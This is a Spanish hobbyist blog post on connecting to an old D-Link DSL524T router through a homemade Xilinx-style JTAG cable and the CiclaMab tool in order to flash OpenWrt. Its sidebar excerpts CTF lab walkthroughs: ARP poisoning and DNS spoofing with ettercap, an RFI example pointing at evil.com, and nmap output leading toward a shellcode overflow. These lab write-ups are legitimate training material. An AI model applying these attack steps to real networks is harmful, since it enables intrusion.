Openwrt en DSL524T+Jtag funcionamiento

Aunque es un router ADSL viejo, el D-Link DSL524T puede funcionar perfectamente con las líneas actuales, y en cualquier caso como switch. Aunque el software existente permite manipularlo via WEB (recomiendo sobre todo el programa Adam2App), tiene conexiones internas serie y JTAG, esta última realmente potente y para casos extremos (bricked). 

El firmware en cuestión que podemos ponerle para actualizarlo es el barrier 14.07


En esta página italiana lo explican bien


Yo me centraré en la conexión JTAG, que en este caso es de 14 pines (MIPS EJTAG 2.6). 


Podemos fabricarlo "fácilmente":

1- conector impresora macho: 25 Pin Male Solder Cup DB25



3- un soldador

3- un ordenador viejo con windows xp y entrada LPT



El ordenador tiene que ser antiguo por la velocidad de la CPU y el puerto LPT. En mi caso lo he probado con un Intel Pentium 4. La razón es que la conexión JTAG solo funciona bien a una baja velocidad, por lo que no funciona en ordenadores recientes aunque tengan puerto LPT.

Posibles esquemas del cable:

XILINX 

 XILINX BUFFERED

 XELOA
 WIGGLER

Yo he optado por el primero, XILINX estándar, Unbuffered Cable, Xilinx DLC5 Cable III


con esta modificación propia del autor del CiclaMab




Y el resultado ha sido este




Ahora usaremos el programa CiclaMab (Che Iddio Ce La Mandi Buonapara conectarnos. Necesita Windows XP. 



No es necesario conectarlo por red por lo que obviamos la petición inicial y pulsamos "Imposta". Luego vamos a "Strumenti" y seleccionamos Jtag o pulsamos F9 directamente. En "Interfaccia JTAG" seleccionamos Xilinx y damos a "Probe". Si todo va vien nos habremos conectado via JTAG, que es la modalidad de acceso más avanzada que hay para modificar el dispositivo.








Comentarios

Publicar un comentario

Entradas populares de este blog

Actualizando a LEDE (Openwrt based) el router Afoundry EW-1200

Imagen
Tenemos aquí un router "chino" que en principio llama la atención por las 6 antenas que trae. Por el precio sería un router de gama media-alta. Aquí viene una review. Me quedo con la aparente potencia del procesador  Mediatek  MT7621   de 2 núcleos a 880 Mhz y la capacidad de emitir wifi simultáneamente en las bandas de 2.4 y 5 Ghz. Incorpora además -  128 MB  DDR3 RAM - 128 Mb SPI flash - 1 USB 3.0 Funciona bastante bien, pero la interfaz web es demasiado austera y deja muchos parámetros ocultos que lo harían más potente. En concreto trae instalado el Openwrt Barrier Breaker 14.07 pero modificado. Para manipularlo abrimos la carcasa y conectamos por el puerto serial que trae, en este caso de solo 3 pines Rx,Gnd,Tx. No trae JTAG. Para conectar usamos de nuevo un cable prolific  Plugable USB to RS-232 DB9  y un  Serial Port Converter  JY-R2T V1.2 RS232. Al ser una conexión de solo tres pines sin VCC (alimentación), tenemos que alimentar manualme
Leer más

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N
Leer más

GITTYSBURG: 1 : gitlab+bof shellcode jmpesp

 https://www.vulnhub.com/entry/gittysburg-1,271/ Funciona mejor con vmware y no siempre activa el puerto 8261. Reiniciar varias veces. ┌──(kali㉿kali)-[~/gittisburg] └─$ nmap 192.168.2.7 -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-08 12:35 EST Nmap scan report for gittysburg.home (192.168.2.7) Host is up (0.0015s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT     STATE SERVICE 22/tcp   open  ssh 80/tcp   open  http 8060/tcp open  aero 8261/tcp open  unknown 9094/tcp open  unknown Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds                                                                                                               - En 80 tenemos un gitlab . Con fuzz sacamos folder root y podemos ver los proyectos de " david ". En el puerto 8261 tenemos un shell pero necesitamos las claves. En el proyecto rash del gitlab encontramos el binario y en /root/jeebs-v2/blob/master/  lo que parece el código fuente server.c . La flag1  flag
Leer más